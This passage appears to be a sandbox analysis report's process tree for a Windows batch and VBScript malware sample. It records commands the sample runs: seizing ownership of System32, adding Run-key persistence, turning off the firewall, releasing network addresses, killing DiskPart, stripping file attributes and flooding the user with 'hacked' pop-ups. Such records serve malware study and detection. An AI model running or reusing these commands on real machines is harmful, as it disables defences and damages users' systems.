5⤵
PID:8256

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:8640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:8648

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:9160

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8236

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8320

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:8584

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:9144

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:1640

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:9816

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10016

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10220

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:5624

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:8788

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10404

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10628

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:10764

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:11048

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:10736

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10592

C:\Windows\system32\calc.exe
calc
5⤵
PID:10980

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11216

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:9644

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11344

C:\Windows\system32\calc.exe
calc
5⤵
PID:11372

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11480

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:11724

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11776

C:\Windows\system32\calc.exe
calc
5⤵
PID:11924

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:12060

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11520

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:7364

C:\Windows\system32\calc.exe
calc
4⤵
PID:7464

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:7668

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:7784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:7172

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5608

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:932

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:7080

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:7416

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:2500

C:\Windows\system32\calc.exe
calc
3⤵
- Modifies registry class
PID:4724

C:\Windows\explorer.exe
explorer.exe
3⤵
- Modifies registry class
PID:3948

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
3⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:3112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:5288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:800

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5256

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:1420

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:4344

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:5448

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:3440

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:1384

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:4836

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:4496

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5008

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:3452

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:2564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5864

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:4476

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:1608

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5928

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:3440

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:2300

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:6156

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:6192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2108

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
5⤵
- Modifies Windows Firewall
PID:8300

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:9080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:5748

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:8364

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8656

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8912

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9092

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:1220

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:9296

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:9328

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9480

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:9604

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:9920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10040

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10064

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10076

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10128

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10212

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:8408

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:9232

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:9436

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:2936

C:\Windows\system32\calc.exe
calc
5⤵
PID:9392

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:9836

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:9728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:10204

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:8408

C:\Windows\system32\calc.exe
calc
5⤵
PID:8968

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:9364

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:7144

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:4508

C:\Windows\system32\calc.exe
calc
5⤵
PID:6704

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:10304

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10432

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:12044

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:8496

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10052

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:8984

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:7696

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:13152

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:6236

C:\Windows\system32\calc.exe
calc
4⤵
PID:6244

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:6252

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:6412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8884

C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
6⤵
PID:3036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:9184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:8704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:376

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:3036

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:1920

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:5088

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:1916

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:9656

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:9968

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:11020

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:11076

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10256

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10328

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:5960

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9360

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:6840

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:10528

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:10860

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:9316

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:11452

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:11868

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:8848

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10576

C:\Windows\system32\calc.exe
calc
5⤵
PID:7124

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:8924

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:11260

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:1656

C:\Windows\system32\calc.exe
calc
5⤵
PID:12304

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:12976

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:8584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
5⤵
PID:8800

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:13008

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:6648

C:\Windows\system32\calc.exe
calc
4⤵
PID:6768

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:6932

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:5148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:6592

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:1896

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:3172

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:3544

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:5508

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9316

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:9692

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:9324

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:11832

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:1444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:7480

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:13036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:5056

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:3876

C:\Windows\system32\calc.exe
calc
4⤵
PID:7228

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:7376

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:7500

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5468

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:4320

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:6988

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:7188

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:4752

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4984

C:\Windows\system32\calc.exe
calc
3⤵
- Modifies registry class
PID:1404

C:\Windows\explorer.exe
explorer.exe
3⤵
- Modifies registry class
PID:4548

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
3⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
PID:1484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5268

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:5600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:5700

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6136

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:1260

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:2600

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5200

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:5220

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5280

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:3196

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6044

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:1596

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:2672

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5324

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6372

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:6628

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6912

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:6732

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:7308

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:7728

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:8120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:6436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:7052

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:8596

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:9516

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9496

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:9700

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9900

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
PID:10536

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Views/modifies file attributes
PID:10888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:13160

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:5212

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:6588

C:\Windows\system32\calc.exe
calc
4⤵
PID:6520

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:7624

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:7656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
4⤵
PID:6772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:8236

C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
6⤵
PID:1920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2080

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:5300

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Modifies file permissions
PID:8528

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8792

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:8792

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:9272

